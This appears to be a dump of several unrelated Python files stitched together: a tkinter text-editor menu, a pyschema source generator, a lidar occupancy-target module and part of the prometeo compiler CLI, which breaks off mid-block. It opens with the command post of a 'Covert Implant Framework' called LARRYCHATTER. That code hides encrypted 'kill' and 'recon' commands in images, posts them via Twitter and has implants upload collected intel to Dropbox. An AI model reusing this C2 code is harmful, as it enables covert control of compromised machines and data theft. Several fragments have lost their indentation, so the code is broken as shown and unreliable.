command = input(colored(">> ", "blue"))
if command == 'help':
print("\n")
print_help()
print("\n")
elif command == 'shutdown':
print("\n")
print(colored("[+] Command Post is shutting down...", "blue"))
print("\n")
sys.exit(0)
elif command == 'kill':
print("\n")
imgpath = input(colored("Enter the complete path to the Image file: ", 'blue'))
message = 'kill'
enctext = encrypt(message, key)
embedInImage(enctext, imgpath)
try:
postTweetPhoto()
print("\n")
print(colored("[+] kill command sent", "blue"))
print("\n")
except:
print("\n")
print(colored("[!] Unable to send kill command", "blue"))
print("\n")
elif command == 'recon':
print("\n")
imgpath = input(colored("Enter the complete path to the Image file: ", 'blue'))
print("\n")
api = input(colored("Enter the Dropbox API Key for Implant to upload the collected Intel: ", "blue"))
message = command + " " + api
enctext =encrypt(message, key)
embedInImage(enctext, imgpath)
try:
postTweetPhoto()
print("\n")
print(colored("[+] recon command sent", "blue"))
print("\n")
except:
print("\n")
print(colored("[!] Unable to send recon command", "blue"))
print("\n")
else:
print("\n")
print(colored("[!] Command unrecognized.", "blue"))
print("\n")
def embedInImage(message,path):
path = path.encode()
image = Image.open(path)
message = message.encode()
stegoImage = stepic.encode(image, message)
stegoImageCWD = os.getcwd()
stegoImagePath = stegoImageCWD + '/secret-file.png'
stegoImage.save(stegoImagePath, 'PNG')
def postTweetPhoto():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
stegoImageCWD = os.getcwd()
stegoImagePath = stegoImageCWD + '/secret-file.png'
api.update_with_media(stegoImagePath)
def print_help():
for cmd, v in COMMANDS.items():
print(colored("{0}:\t{1}".format(cmd, v[0]), 'blue'))
def print_banner():
ascii_banner = pyfiglet.figlet_format("LARRYCHATTER")
print(colored(ascii_banner, 'blue'))
print("\n")
print(colored("------------------------ Covert Implant Framework ------------------------", "blue"))
print("\n")
print(colored("Created by @UpayanSaha", "blue"))
if __name__ == "__main__":
main()
|
11557179
|
import pkg_resources # part of setuptools
__version__ = pkg_resources.require("concoct")[0].version
|
11557189
|
import tkinter as tk
import tkinter.font as tk_font
import os
from tkinter import ttk
class ContextMenu(tk.Listbox):
def __init__(self, parent, *args, **kwargs):
tk.Listbox.__init__(self, parent, *args, **kwargs)
self.font_family = parent.font_family
self.font_color = parent.menu_fg
self.bg_color = parent.bg_color
self.active_bg = parent.menubar_bg_active
self.active_fg = parent.menubar_fg_active
self.parent = parent
self.changes = [""]
self.steps = int()
        # set up the right-click context menu
self.right_click_menu = tk.Menu(
parent,
font='DroidSansFallback',
fg=self.font_color,
bg=self.bg_color,
activebackground=self.active_bg,
activeforeground=self.active_fg,
bd=0,
tearoff=0)
        # commands must be callables; wrap event_generate in lambdas so the
        # events fire on click rather than at menu-construction time
        self.right_click_menu.add_command(
            label='Cut',
            command=lambda: self.parent.textarea.event_generate('<<Cut>>'))
        self.right_click_menu.add_command(
            label='Copy',
            command=lambda: self.parent.textarea.event_generate('<<Copy>>'))
        self.right_click_menu.add_command(
            label='Paste',
            command=lambda: self.parent.textarea.event_generate('<<Paste>>'))
self.right_click_menu.add_command(
label='Bold',
command=self.bold)
self.right_click_menu.add_command(
label='Highlight',
            command=self.highlight)
def popup(self, event):
try:
self.right_click_menu.tk_popup(event.x_root, event.y_root, 0)
finally:
self.right_click_menu.grab_release()
def undo(self, event=None):
if self.steps != 0:
self.steps -= 1
self.parent.textarea.delete(0, tk.END)
self.parent.textarea.insert(tk.END, self.changes[self.steps])
def redo(self, event=None):
if self.steps < len(self.changes):
self.parent.textarea.delete(0, tk.END)
self.parent.textarea.insert(tk.END, self.changes[self.steps])
self.steps += 1
def add_changes(self, event=None):
if self.parent.textarea.get() != self.changes[-1]:
self.changes.append(self.parent.textarea.get())
self.steps += 1
# Setting the selected text to be bold
def bold(self, event=None):
if self.parent.filename:
try:
if(os.path.splitext(self.parent.filename)[1][1:] == "txt"):
current_tags = self.parent.textarea.tag_names("sel.first")
bold_font = tk_font.Font(self.parent.textarea, self.parent.textarea.cget("font"))
bold_font.configure(weight = "bold")
self.parent.textarea.tag_config("bold", font = bold_font)
if "bold" in current_tags:
self.parent.textarea.tag_remove("bold", "sel.first", "sel.last")
else:
self.parent.textarea.tag_add("bold", "sel.first", "sel.last")
else:
self.parent.statusbar.update_status('no txt bold')
except tk.TclError:
pass
else:
self.parent.statusbar.update_status('no file')
    def highlight(self, event=None):
if self.parent.filename:
try:
if(os.path.splitext(self.parent.filename)[1][1:] == "txt"):
new_color = self.parent.menubar.open_color_picker()
current_tags = self.parent.textarea.tag_names("sel.first")
highlight_font = tk_font.Font(self.parent.textarea, self.parent.textarea.cget("font"))
self.parent.textarea.tag_config(
f"highlight_{new_color}",
font = highlight_font,
foreground = "black",
background = new_color)
if "highlight" in current_tags:
for tag in current_tags:
if "highlight" in tag:
print(tag)
self.parent.textarea.tag_remove(tag, "sel.first", "sel.last")
else:
self.parent.textarea.tag_add("highlight", "sel.first", "sel.last")
self.parent.textarea.tag_add(f"highlight_{new_color}","sel.first", "sel.last")
else:
self.parent.statusbar.update_status('no txt high')
except tk.TclError:
pass
else:
self.parent.statusbar.update_status('no file')
|
11557232
|
import copy
from pyschema import types
import pyschema
import os
import sys
from collections import defaultdict
DEFAULT_INDENT = " " * 4
class SourceGenerationError(Exception):
pass
def to_python_source(classes, indent=DEFAULT_INDENT):
"""Convert a set of pyschemas to executable python source code
Currently supports all built-in types for basic usage.
Notably not supported:
* Maintaining class hierarchy
* Methods, properties and non-field attributes
* SELF-references
"""
return header_source() + "\n" + classes_source(classes, indent)
RESERVED_KEYWORDS = [
"and", "del", "from", "not", "while", "as", "elif",
"global", "or", "with", "assert", "else", "if",
"pass", "yield", "break", "except", "import",
"print", "class", "exec", "in", "raise", "continue",
"finally", "is", "return", "def", "for", "lambda", "try"
]
def make_safe(package_name):
parts = package_name.split(".")
for kw in RESERVED_KEYWORDS:
while kw in parts:
i = parts.index(kw)
parts[i] = kw + "_"
return ".".join(parts)
class PackageBuilder(object):
def __init__(self, target_folder, parent_package, indent=DEFAULT_INDENT):
self.target_folder = target_folder
self.parent_package = parent_package
self.indent = indent
def get_namespace(self, schema):
try:
namespace = make_safe(schema._namespace)
except AttributeError:
namespace = None
return namespace
def get_namespace_clusters(self, all_classes):
namespace_cluster = defaultdict(set)
for c in all_classes:
namespace = self.get_namespace(c)
namespace_cluster[namespace].add(c)
return namespace_cluster
def format_definitions(self, classes):
return "\n\n".join([_class_source(c, self.indent) for c in classes])
def write_namespace_file(self, namespace, module_code):
if not namespace:
key = ['__init__']
else:
key = namespace.split('.')
output_file = os.path.join(self.target_folder, *key) + '.py'
output_dir = os.path.dirname(output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(output_file, 'w') as out_fn:
out_fn.write(module_code)
def write_init_files(self):
def touch_init_file_in_folder(folder):
path = os.path.join(folder, '__init__.py')
if not os.path.exists(path):
open(path, 'w').close()
touch_init_file_in_folder(self.target_folder)
for root, dirs, _ in os.walk(self.target_folder):
for d in dirs:
touch_init_file_in_folder(os.path.join(root, d))
def format_imports(self, imported_classes):
if not imported_classes:
return "\n"
imported_namespaces = self.get_namespace_clusters(imported_classes)
lines = []
for namespace, schemas in imported_namespaces.iteritems():
if self.parent_package:
if namespace:
module = "{}.{}".format(self.parent_package, namespace)
else:
module = self.parent_package
else:
if not namespace:
module = "."
else:
module = namespace
class_part = ", ".join(s.__name__ for s in schemas)
lines.append("from {} import {}".format(module, class_part))
return "\n".join(lines) + "\n\n"
def _get_namespace_prefixes(self, namespaces):
prefixes = []
for n in namespaces:
if n:
parts = n.split(".")
prefixes.append(".".join(parts[:-1]))
return prefixes
def from_classes_with_refs(self, classes):
class_graph = CachedGraphTraverser()
all_classes = set(classes)
for c in classes:
referenced_schemas = class_graph.find_descendants(c)
all_classes |= set(referenced_schemas)
namespace_cluster = self.get_namespace_clusters(all_classes)
parent_namespaces = self._get_namespace_prefixes(namespace_cluster.keys())
ordered_schemas = class_graph.get_reference_ordered_schemas(all_classes)
# Since we don't want to use the previous cached results we create a new instance
# This CachedGraphTraverser will only keep one-child depth for its find_descendants
child_only_class_graph = CachedGraphTraverser()
for namespace, classes in namespace_cluster.iteritems():
inlined_classes = [c for c in ordered_schemas if c in classes]
imported_classes = set()
for inlined in inlined_classes:
direct_references = child_only_class_graph.find_descendants(inlined, max_depth=1)
imported_classes |= set([c for c in direct_references if c not in inlined_classes])
module_code = (
header_source() +
self.format_imports(imported_classes) +
self.format_definitions(inlined_classes)
)
if namespace not in parent_namespaces:
filename = namespace
else:
filename = "{}.{}".format(namespace, "__init__")
self.write_namespace_file(filename, module_code)
self.write_init_files()
def to_python_package(classes, target_folder, parent_package=None, indent=DEFAULT_INDENT):
'''
This function can be used to build a python package representation of pyschema classes.
One module is created per namespace in a package matching the namespace hierarchy.
Args:
classes: A collection of classes to build the package from
target_folder: Root folder of the package
parent_package: Prepended on all import statements in order to support absolute imports.
parent_package is not used when building the package file structure
indent: Indent level. Defaults to 4 spaces
'''
PackageBuilder(target_folder, parent_package, indent).from_classes_with_refs(classes)
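# A minimal usage sketch (hypothetical record; assumes pyschema's Record and
# Text types, the same API this module's generated header imports):
#
#     import pyschema
#     from pyschema.types import Text
#
#     class MyRecord(pyschema.Record):
#         _namespace = 'demo.records'
#         name = Text()
#
#     to_python_package([MyRecord], 'generated', parent_package='myapp.schemas')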
def classes_source(classes, indent=DEFAULT_INDENT):
all_classes = set(classes)
class_graph = CachedGraphTraverser()
for c in classes:
referenced_schemas = class_graph.find_descendants(c)
all_classes |= set(referenced_schemas)
ordered = class_graph.get_reference_ordered_schemas(all_classes)
return "\n\n".join([_class_source(c, indent) for c in ordered])
def header_source():
"""Get the required header for generated source"""
return (
"import pyschema\n"
"from pyschema.types import *\n"
"from pyschema.core import NO_DEFAULT\n"
)
def _class_source(schema, indent):
"""Generate Python source code for one specific class
Doesn't include or take into account any dependencies between record types
"""
def_pattern = (
"class {class_name}(pyschema.Record):\n"
"{indent}# WARNING: This class was generated by pyschema.to_python_source\n"
"{indent}# there is a risk that any modification made to this class will be overwritten\n"
"{optional_namespace_def}"
"{field_defs}\n"
)
if hasattr(schema, '_namespace'):
optional_namespace_def = "{indent}_namespace = {namespace!r}\n".format(
namespace=schema._namespace, indent=indent)
else:
optional_namespace_def = ""
field_defs = [
"{indent}{field_name} = {field!r}".format(field_name=field_name, field=field, indent=indent)
for field_name, field in schema._fields.iteritems()
]
if not field_defs:
field_defs = ["{indent}pass".format(indent=indent)]
return def_pattern.format(
class_name=schema._schema_name,
optional_namespace_def=optional_namespace_def,
field_defs="\n".join(field_defs),
indent=indent
)
class CachedGraphTraverser(object):
def __init__(self):
self.descendants = {}
self.started = set()
def find_descendants(self, a, max_depth=sys.getrecursionlimit()):
if a in self.descendants:
# fetch from cache
return self.descendants[a]
self.started.add(a)
subs = set()
if max_depth > 0:
if pyschema.ispyschema(a):
for _, field in a._fields.iteritems():
subs |= self.find_descendants(field, max_depth)
self.descendants[a] = subs
elif isinstance(a, types.List):
subs |= self.find_descendants(a.field_type, max_depth)
elif isinstance(a, types.Map):
subs |= self.find_descendants(a.value_type, max_depth)
elif isinstance(a, types.SubRecord):
subs.add(a._schema)
if a._schema not in self.started: # otherwise there is a circular reference
subs |= self.find_descendants(a._schema, max_depth-1)
self.started.remove(a)
return subs
def get_reference_ordered_schemas(self, schema_set):
for schema in schema_set:
self.find_descendants(schema)
descendants = copy.deepcopy(self.descendants) # a working copy
ordered_output = []
while descendants:
leaves = []
for root, referenced in descendants.iteritems():
if len(referenced) == 0:
leaves.append(root)
if not leaves:
raise SourceGenerationError("Circular reference in input schemas, aborting")
ordered_output += leaves
for leaf in leaves:
# remove all leaves
descendants.pop(leaf)
for root, referenced in descendants.iteritems():
if leaf in referenced:
referenced.remove(leaf)
return ordered_output
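# Minimal usage sketch (assumes the pyschema library is importable; MyRecord
# is a hypothetical example class, not part of this module):
if __name__ == '__main__':
    from pyschema.types import Text, Integer
    class MyRecord(pyschema.Record):
        name = Text()
        count = Integer()
    # Render standalone Python source for MyRecord and everything it references.
    print(classes_source([MyRecord]))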
|
11557257
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from .occ_targets_template import OccTargetsTemplate
from ....utils import common_utils, coords_utils, point_box_utils
class OccTargets3D(OccTargetsTemplate):
def __init__(self, model_cfg, voxel_size, point_cloud_range, data_cfg, grid_size,
num_class, voxel_centers):
super().__init__(model_cfg, voxel_size, point_cloud_range, data_cfg, grid_size,
num_class, voxel_centers)
self.reg = model_cfg.PARAMS.get("REG", False)
def create_predict_area(self, voxel_bnysynxsxnzsz, voxel_num_points_float, batch_size, batch_dict):
return self.create_predict_area2d(voxel_bnysynxsxnzsz, voxel_num_points_float, batch_size, batch_dict)
def forward(self, batch_dict, **kwargs):
# voxels: [M, max_points, ndim] float tensor. only contain points.
# voxel_coords: [M, 3] int32 tensor. zyx format.
# voxel_num_points: [M] int32 tensor.
voxel_features, voxel_num_points, coords = batch_dict['voxels'], batch_dict['voxel_num_points'], batch_dict['voxel_coords']
# print("voxel_features", voxel_features.shape)
voxel_count = voxel_features.shape[1]
# print("voxel_count", voxel_features.shape[0])
mask = self.get_paddings_indicator(voxel_num_points, voxel_count, axis=0)
batch_dict["voxel_point_mask"] = mask
batch_dict = self.create_voxel_res_label(batch_dict, mask) if self.reg else self.create_voxel_label(batch_dict, mask)
# if test inference speed
# if batch_dict["is_train"]:
# batch_dict = self.create_voxel_res_label(batch_dict, mask)
# else:
# batch_dict["point_dist_mask"] = torch.zeros((batch_dict["gt_boxes"].shape[0], self.ny, self.nx, self.nz * self.sz * self.sy * self.sx), device="cuda")
if "point_drop_inds" in batch_dict.keys():
inds = batch_dict["point_drop_inds"]
mask[inds[:, 0], inds[:, 1]] = torch.zeros_like(inds[:, 0], dtype=torch.bool)
batch_dict["final_point_mask"] = mask
return batch_dict
def create_voxel_res_label(self, batch_dict, valid_mask):
occ_pnts = torch.cat([coords_utils.uvd2absxyz(batch_dict['voxels'][..., 0], batch_dict['voxels'][..., 1], batch_dict['voxels'][..., 2], self.data_cfg.OCC.COORD_TYPE), batch_dict['voxels'][..., 3:]], dim=-1)
if self.point_coding == "absxyz" or self.point_coding == True:
batch_dict['voxels'] = occ_pnts
elif self.point_coding == "both":
batch_dict['voxels'] = torch.cat([occ_pnts[..., :3], batch_dict["voxels"]], dim=-1)
voxel_features, voxel_coords, gt_boxes_num, gt_boxes, bs = occ_pnts, batch_dict['voxel_coords'], batch_dict[
"gt_boxes_num"], batch_dict["gt_boxes"], batch_dict["gt_boxes"].shape[0]
if self.num_class == 1:
gt_label = (gt_boxes[..., -1:] > 1e-2).to(torch.float32)
gt_boxes = torch.cat([gt_boxes[..., :-1], gt_label], dim=-1)
valid_coords_bnznynx, valid_voxel_features = self.get_valid(valid_mask, voxel_coords, voxel_features)
voxelwise_mask = self.get_voxelwise_mask(valid_coords_bnznynx, bs)
vcc_mask = self.create_predict_area3d(bs, valid_coords_bnznynx)
occ_voxelwise_mask = self.filter_occ(self.occ_from_ocp(vcc_mask, batch_dict, bs, voxelwise_mask, valid_voxel_features[..., :3], valid_coords_bnznynx[..., 0], empty_sur_thresh=self.data_cfg.OCC.EMPT_SUR_THRESH, type=self.data_cfg.OCC.COORD_TYPE), occ_pnts, voxelwise_mask)
fore_voxelwise_mask, fore_res_mtrx, mirr_fore_voxelwise_mask, mirr_res_mtrx = self.get_fore_mirr_voxelwise_mask_res(batch_dict, bs, valid_coords_bnznynx, valid_voxel_features, gt_boxes_num, gt_boxes)
mirr_fore_voxelwise_mask = mirr_fore_voxelwise_mask * (1 - voxelwise_mask) # exclude original occupied
mirr_res_mtrx = mirr_res_mtrx * (1 - voxelwise_mask).unsqueeze(1)
if self.model_cfg.TARGETS.TMPLT:
bm_voxelwise_mask, bm_res_mtrx = self.get_bm_voxelwise_mask_res(batch_dict, bs, gt_boxes_num, gt_boxes)
bm_voxelwise_mask = bm_voxelwise_mask * (1 - voxelwise_mask) * (1 - mirr_fore_voxelwise_mask)
bm_res_mtrx = bm_res_mtrx * (1 - voxelwise_mask).unsqueeze(1) * (1 - mirr_fore_voxelwise_mask).unsqueeze(1)
else:
bm_voxelwise_mask = torch.zeros_like(voxelwise_mask, dtype=voxelwise_mask.dtype,
device=voxelwise_mask.device)
##### forebox_label #####
forebox_label = None
if self.data_cfg.OCC.BOX_WEIGHT != 1.0:
bs, max_num_box, box_c = list(gt_boxes.shape)
forebox_label = torch.zeros([bs, self.nz, self.ny, self.nx], dtype=torch.int8, device="cuda")
shift = torch.tensor(np.asarray([[0.0, 0.0, 0.0]]), device="cuda", dtype=torch.float32)
for i in range(bs):
cur_gt_boxes = gt_boxes[i, :gt_boxes_num[i]]
all_voxel_centers_2d = point_box_utils.rotatez(self.all_voxel_centers_2d, batch_dict["rot_z"][i]) if "rot_z" in batch_dict else self.all_voxel_centers_2d
voxel_box_label2d = point_box_utils.torch_points_in_box_2d_mask(all_voxel_centers_2d, cur_gt_boxes, shift=shift[..., :2]).view(self.ny, self.nx).nonzero()
if voxel_box_label2d.shape[0] > 0:
all_voxel_centers_filtered = self.all_voxel_centers[:, voxel_box_label2d[:, 0],
voxel_box_label2d[:, 1], ...].reshape(-1, 3)
if "rot_z" in batch_dict:
all_voxel_centers_filtered = point_box_utils.rotatez(all_voxel_centers_filtered, batch_dict["rot_z"][i])
voxel_box_label = point_box_utils.torch_points_in_box_3d_label(all_voxel_centers_filtered, cur_gt_boxes, gt_boxes_num[i], shift=shift)[0]
forebox_label[i, :, voxel_box_label2d[:, 0], voxel_box_label2d[:, 1]] = voxel_box_label.view(self.nz, -1)
if self.data_cfg.OCC.DROPOUT_RATE > 1e-3 and batch_dict["is_train"]:
batch_dict = self.dropout(batch_dict, fore_voxelwise_mask)
batch_dict = self.prepare_cls_loss_map(batch_dict, vcc_mask, voxelwise_mask, occ_voxelwise_mask, fore_voxelwise_mask, mirr_fore_voxelwise_mask, bm_voxelwise_mask, forebox_label=forebox_label)
batch_dict = self.prepare_reg_loss_map(batch_dict, fore_res_mtrx, mirr_res_mtrx, bm_res_mtrx)
return batch_dict
def get_bm_voxelwise_mask_res(self, batch_dict, bs, gt_boxes_num, gt_boxes):
bm_voxelwise_mask = torch.zeros([bs, self.nz, self.ny, self.nx], dtype=torch.uint8, device="cuda")
if "bm_points" in batch_dict and len(batch_dict["bm_points"]) > 0:
bm_binds, bm_carte_points = batch_dict["bm_points"][..., 0:1].to(torch.int64), batch_dict["bm_points"][...,1:]
label_array = torch.nonzero(point_box_utils.torch_points_in_box_3d_label_batch(bm_carte_points, bm_binds, gt_boxes, gt_boxes_num, bs))[..., 0]
bm_binds = bm_binds[..., 0][label_array]
bm_carte_points = bm_carte_points[label_array, :]
occ_coords_bm_points = coords_utils.cartesian_occ_coords(bm_carte_points, type=self.data_cfg.OCC.COORD_TYPE)
if "rot_z" in batch_dict:
rot_z = batch_dict["rot_z"][bm_binds]
if self.data_cfg.OCC.COORD_TYPE == "cartesian":
noise_rotation = -rot_z * np.pi / 180
occ_coords_bm_points = common_utils.rotate_points_along_z(occ_coords_bm_points.unsqueeze(1), noise_rotation).squeeze(1)
else:
occ_coords_bm_points[..., 1] += rot_z
inrange_coords_bm, inrange_inds_bm = self.point2coords_inrange(occ_coords_bm_points, self.point_origin_tensor, self.point_max_tensor, self.max_grid_tensor, self.min_grid_tensor, self.voxel_size)
bm_coords = torch.cat([bm_binds[inrange_inds_bm].unsqueeze(-1), self.xyz2zyx(inrange_coords_bm)], dim=-1)
bm_res_mtrx = self.get_mean_res(bm_carte_points[inrange_inds_bm], bm_coords, bs, self.nz, self.ny, self.nx, batch_dict, rot=True)
bm_voxelwise_mask[bm_coords[..., 0], bm_coords[..., 1], bm_coords[..., 2], bm_coords[..., 3]] = torch.ones_like(bm_coords[..., 0], dtype=torch.uint8, device=bm_voxelwise_mask.device) ##
else:
bm_res_mtrx = torch.zeros([bs, 3, self.nz, self.ny, self.nx], dtype=torch.float32, device="cuda")
return bm_voxelwise_mask, bm_res_mtrx
def get_mean_res(self, feat, coords, bs, nz, ny, nx, batch_dict, rot=False):
xyz_spatial = torch.zeros([bs, 3, nz, ny, nx], dtype=torch.float32, device="cuda")
if len(coords) > 0:
uni_coords, inverse_indices, labels_count = torch.unique(coords, return_inverse=True, return_counts=True, dim=0)
mean_xyz = torch.zeros([uni_coords.shape[0], 3], dtype=feat.dtype, device=feat.device).scatter_add_(0, inverse_indices.view(inverse_indices.size(0), 1).expand(-1, 3), feat[..., :3]) / labels_count.float().unsqueeze(1)
# mean_xyz = torch_scatter.scatter_mean(feat[..., :3], inverse_indices, dim=0)
mean_xyz -= self.get_voxel_center_xyz(uni_coords, batch_dict, rot=rot)
xyz_spatial[uni_coords[..., 0], :, uni_coords[..., 1], uni_coords[..., 2], uni_coords[..., 3]] = mean_xyz
return xyz_spatial
def get_voxel_center_xyz(self, coords, batch_dict, rot=True):
voxel_centers = (coords[:, [3, 2, 1]].float() + 0.5) * self.voxel_size + self.point_origin_tensor
if self.data_cfg.OCC.COORD_TYPE == "cartesian":
if "rot_z" in batch_dict and rot:
rot_z = batch_dict["rot_z"][coords[:, 0]]
noise_rotation = rot_z * np.pi / 180
voxel_centers = common_utils.rotate_points_along_z(voxel_centers.unsqueeze(1), noise_rotation).squeeze(1)
else:
if "rot_z" in batch_dict and rot:
rot_z = batch_dict["rot_z"][coords[:, 0]]
voxel_centers[..., 1] -= rot_z
voxel_centers = coords_utils.uvd2absxyz(voxel_centers[..., 0], voxel_centers[..., 1], voxel_centers[..., 2], self.data_cfg.OCC.COORD_TYPE)
return voxel_centers
def get_fore_mirr_voxelwise_mask_res(self, batch_dict, bs, valid_coords_bnznynx, valid_voxel_features, gt_boxes_num, gt_boxes):
fore_voxelwise_mask, mirr_fore_voxelwise_mask = [torch.zeros([bs, self.nz, self.ny, self.nx], dtype=torch.uint8, device="cuda") for i in range(2)]
fore_inds, mirr_inbox_point, mirr_binds = point_box_utils.torch_points_and_sym_in_box_3d_batch( valid_voxel_features[..., :3], valid_coords_bnznynx, gt_boxes, gt_boxes_num, bs, batch_dict['box_mirr_flag'])
fore_coords = valid_coords_bnznynx[fore_inds] # b zyx
fore_voxelwise_mask[fore_coords[..., 0], fore_coords[..., 1], fore_coords[..., 2], fore_coords[..., 3]] = torch.ones_like(fore_coords[..., 0], dtype=torch.uint8, device=fore_voxelwise_mask.device)
fore_res_mtrx = self.get_mean_res(valid_voxel_features[fore_inds], fore_coords, bs, self.nz, self.ny, self.nx, batch_dict, rot=True)
mirr_res_mtrx = torch.zeros([bs, 3, self.nz, self.ny, self.nx], device=fore_voxelwise_mask.device, dtype=torch.float32)
if mirr_inbox_point is not None:
occ_coords_mirr_points = coords_utils.cartesian_occ_coords(mirr_inbox_point, type=self.data_cfg.OCC.COORD_TYPE) # sphere x y z
if "rot_z" in batch_dict:
rot_z = batch_dict["rot_z"][mirr_binds]
if self.data_cfg.OCC.COORD_TYPE == "cartesian":
noise_rotation = -rot_z * np.pi / 180
occ_coords_mirr_points = common_utils.rotate_points_along_z(occ_coords_mirr_points.unsqueeze(1), noise_rotation).squeeze(1)
else:
occ_coords_mirr_points[..., 1] += rot_z
inrange_coords_mirr, inrange_inds_mirr = self.point2coords_inrange(occ_coords_mirr_points, self.point_origin_tensor, self.point_max_tensor, self.max_grid_tensor, self.min_grid_tensor, self.voxel_size)
mirr_coords = torch.cat([mirr_binds[inrange_inds_mirr].unsqueeze(-1), self.xyz2zyx(inrange_coords_mirr)], dim=-1) # mirror sphere b z y x
mirr_res_mtrx = self.get_mean_res(mirr_inbox_point[inrange_inds_mirr], mirr_coords, bs, self.nz, self.ny, self.nx, batch_dict, rot=True)
mirr_fore_voxelwise_mask[mirr_coords[..., 0], mirr_coords[..., 1], mirr_coords[..., 2], mirr_coords[..., 3]] = torch.ones_like(mirr_coords[..., 0], dtype=torch.uint8, device=mirr_fore_voxelwise_mask.device)
return fore_voxelwise_mask, fore_res_mtrx, mirr_fore_voxelwise_mask, mirr_res_mtrx
|
11557280
|
import ast
import astpretty as ap
# import typing
import sys
import argparse
import prometeo
import os
import platform
import subprocess
from strip_hints import strip_file_to_string
import json
import numpy as np
# from prometeo.mem.ast_analyzer import compute_reach_graph
from prometeo.mem.ast_analyzer import ast_visitor
from prometeo.mem.ast_analyzer import compute_reach_graph
from copy import deepcopy
import casadi as ca
import time
import re
from collections import OrderedDict
import numexpr
size_of_pointer = 8
size_of_int = 4
size_of_double = 8
makefile_template = '''
CC = gcc
CFLAGS += -fPIC -std=c99
HEAP64_SIZE = {{ HEAP64_SIZE }}
HEAP8_SIZE = {{ HEAP8_SIZE }}
INSTALL_DIR = {{ INSTALL_DIR }}
SRCS += {{ filename }}.c
CFLAGS+=-I$(INSTALL_DIR)/include/blasfeo -I$(INSTALL_DIR)/include/prometeo
CFLAGS+=-DHEAP64_SIZE=$(HEAP64_SIZE)
CFLAGS+=-DHEAP8_SIZE=$(HEAP8_SIZE)
LIBPATH+=-L$(INSTALL_DIR)/lib/blasfeo -L$(INSTALL_DIR)/lib/prometeo
{{ CASADI_TARGET }}
sources: $(SRCS)
\t$(CC) $(LIBPATH) -o {{ filename }} $(CFLAGS) $(SRCS) $(OBJS) -lcpmt -lblasfeo -lm
all: casadi sources
clean:
rm -f *.o {{ filename }}
'''
def str2bool(v):
    if isinstance(v, bool):
        return v
    if v.lower() in ('true', 't', 'yes', '1'):
        return True
    elif v.lower() in ('false', 'f', 'no', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Boolean value expected.')
def resolve_dims_value(dim_vars):
"""
Resolve value of dims and dimv variables.
Arguments:
dim_vars -- ordered dictionary that contains the unresolved dims and dimv variables
"""
for dim_var1_key, dim_var1_value in dim_vars.items():
if isinstance(dim_var1_value, list):
for i in range(len(dim_var1_value)):
for j in range(len(dim_var1_value[i])):
                    dim_value = dim_var1_value[i][j]
                    # check if the value of dim variables contains chars
                    chars = ''.join(re.split("[^a-zA-Z]*", dim_value)).replace(' ', '')
                    # if there are unresolved dim vars, then chars is non-empty
                    if chars:
                        for dim_var2_key, dim_var2_value in dim_vars.items():
                            if not isinstance(dim_var2_value, list):
                                dim_value = re.sub(r'\b' + dim_var2_key + r'\b', dim_var2_value, dim_value)
                                chars = ''.join(re.split("[^a-zA-Z]*", dim_value)).replace(' ', '')
                                if not chars:
                                    break
                        if chars:
                            raise Exception('Could not resolve value {} of dims \
                                variable {}'.format(dim_var1_value, dim_var1_key))
                        dim_var1_value[i][j] = dim_value
else:
# check if the value of dim variables contains chars
chars = ''.join(re.split("[^a-zA-Z]*", dim_var1_value)).replace(' ', '')
            # if there are unresolved dim vars, then chars is non-empty
if chars:
for dim_var2_key, dim_var2_value in dim_vars.items():
if not isinstance(dim_var2_value, list):
dim_var1_value = re.sub(r'\b' + dim_var2_key + r'\b', dim_var2_value, dim_var1_value)
chars = ''.join(re.split("[^a-zA-Z]*", dim_var1_value)).replace(' ', '')
if not chars:
break
if chars:
raise Exception('Could not resolve value {} of dims variable \
{}'.format(dim_var1_value, dim_var1_key))
dim_vars[dim_var1_key] = dim_var1_value
return dim_vars
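# Worked example (hypothetical input): with the reversed ordered dict
# {"m": "n + 2", "n": "10"}, resolving "m" substitutes n to give "10 + 2";
# the numerical evaluation itself happens later via numexpr.evaluate.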
class Graph:
def __init__(self, nodes, edges, start, end, heap_start):
"""
Class that describes a graph used to compute
the worst-case memory usage of a program.
Parameters
----------
nodes : list of strings
list of nodes
edges : list of [(v1,v2), weight]
list of edges
        start : str
            name of start node
        end : str
            name of end node
        heap_start : int
            initial value assigned to the start node (negative of its heap usage)
        """
self.nodes = dict()
for i in range(len(nodes)):
self.nodes[nodes[i]] = 0
self.nodes[start] = heap_start
self.edges = edges
self.start = start
self.end = end
    def compute_shortest_path(self):
        """
        Compute shortest path (worst-case memory usage) from self.start to self.end
        using the Bellman-Ford algorithm.
        Returns
        -------
        path_length : int
            length of shortest path (negative of the worst-case memory usage)
        """
for i in range(len(self.nodes)-1):
for j in range(len(self.edges)):
v1 = self.edges[j][0][0]
v2 = self.edges[j][0][1]
d_v1 = self.nodes[v1]
d_v2 = self.nodes[v2]
w = self.edges[j][1]
if d_v1 + w < d_v2:
self.nodes[self.edges[j][0][1]] = d_v1 + w
# check for negative cycles
for j in range(len(self.edges)):
v1 = self.edges[j][0][0]
v2 = self.edges[j][0][1]
d_v1 = self.nodes[v1]
d_v2 = self.nodes[v2]
w = self.edges[j][1]
if d_v1 + w < d_v2:
raise Exception('Negative cycle detected in call graph!')
return self.nodes[self.end]
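# Worked example (hypothetical weights): heap_start=-32 with two calls
# allocating 16 and 8 bytes gives a worst case of 32 + 16 + 8 = 56 bytes:
#
#     g = Graph(['main', 'f', 'end'],
#               [[('main', 'f'), -16], [('f', 'end'), -8]],
#               'main', 'end', heap_start=-32)
#     assert -g.compute_shortest_path() == 56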
def pmt_main():
"""
Method called by prometeo's command line utility `pmt`
"""
parser = argparse.ArgumentParser()
parser.add_argument("program_name", \
help="name of the prometeo script to be executed")
parser.add_argument("--cgen", type=str2bool, default="False", \
help="generate, compile and execute C code?")
parser.add_argument("--out", type=str, default=None, \
help="redirect output to file")
parser.add_argument("--debug", type=str, default=False, \
help="call raise instead of exit() upon Exception")
args = parser.parse_args()
filename = args.program_name
cgen = args.cgen
red_stdout = args.out
debug = args.debug
if cgen is False:
post = '''main()'''
code_no_hints = strip_file_to_string(filename) + post
tic = time.time()
exec(code_no_hints, globals(), globals())
toc = time.time() - tic
print('Execution time = {:0.3f} sec'.format(toc))
else:
try:
f = open(filename)
f.close()
except FileNotFoundError:
